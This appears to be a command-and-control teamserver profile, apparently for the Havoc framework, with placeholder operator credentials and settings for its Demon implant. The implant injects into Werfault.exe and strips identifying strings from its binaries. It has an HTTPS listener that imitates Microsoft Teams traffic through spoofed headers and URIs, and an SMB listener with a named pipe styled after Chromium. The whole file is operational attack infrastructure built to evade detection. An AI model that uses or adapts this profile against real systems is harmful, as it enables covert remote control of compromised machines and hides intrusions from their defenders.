Teamserver {
    Host = "0.0.0.0"
    Port = 39826

    Build {
        Compiler64 = "/usr/bin/x86_64-w64-mingw32-gcc"
        Compiler86 = "/usr/bin/i686-w64-mingw32-gcc"
        Nasm = "/usr/bin/nasm"
    }
}

Operators {
    user "xXuserXx" {
        Password = "xXpassXx"
    }
}

Demon {
    Sleep = 2
    Jitter = 10
    TrustXForwardedFor = false

    Injection {
        Spawn64 = "C:\\Windows\\System32\\Werfault.exe"
        Spawn32 = "C:\\Windows\\SysWOW64\\Werfault.exe"
    }

    Binary {
        ReplaceStrings-x64 = {
            "demon.x64.dll": "",
            "This program cannot be run in DOS mode.": "",
        }

        ReplaceStrings-x86 = {
            "demon.x86.dll": "",
            "This program cannot be run in DOS mode.": "",
        }
    }
}

Listeners {
    Http {
        Name         = "https (teams profile)"
        Hosts        = [
            "xXlistenerbindaddressXx"
        ]
        HostBind     = "xXlistenerbindaddressXx"
        HostRotation = "random"
        PortBind     = 443
        PortConn     = 443
        Secure       = true
        UserAgent    = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"

        Uris = [
            "/Collector/2.0/settings/"
        ]

        Headers = [
            "Content-Type: application/json; charset=utf-8",
            "Accept: json",
            "Referer: https://teams.microsoft.com/_",
            "x-ms-session-id: f27a1606-024d-b368-5e23-a2d7cf8dd19c",
            "x-ms-client-type: desktop",
            "x-mx-client-version: 27/1.0.0.2024011210",
            "Accept-Encoding: gzip, deflate, br",
            "Origin: https://teams.microsoft.com"
        ]

        Response {
            Headers = [
                "Content-Type: application/json; charset=utf-8",
                "Server: Microsoft-HTTPAPI/2.0",
                "X-Content-Type-Options: nosniff",
                "x-ms-environment: North Europe-prod-3,_cnsVMSS-6_26",
                "x-ms-latency: 40018.2012",
                "Access-Control-Allow-Origin: https://teams.microsoft.com",
                "Access-Control-Allow-Credentials: true",
                "Connection: keep-alive"
            ]
        }

    }

    Smb {
        Name     = "smb"
        PipeName = "mojo.13364.13768.8802231184610456931"
    }
}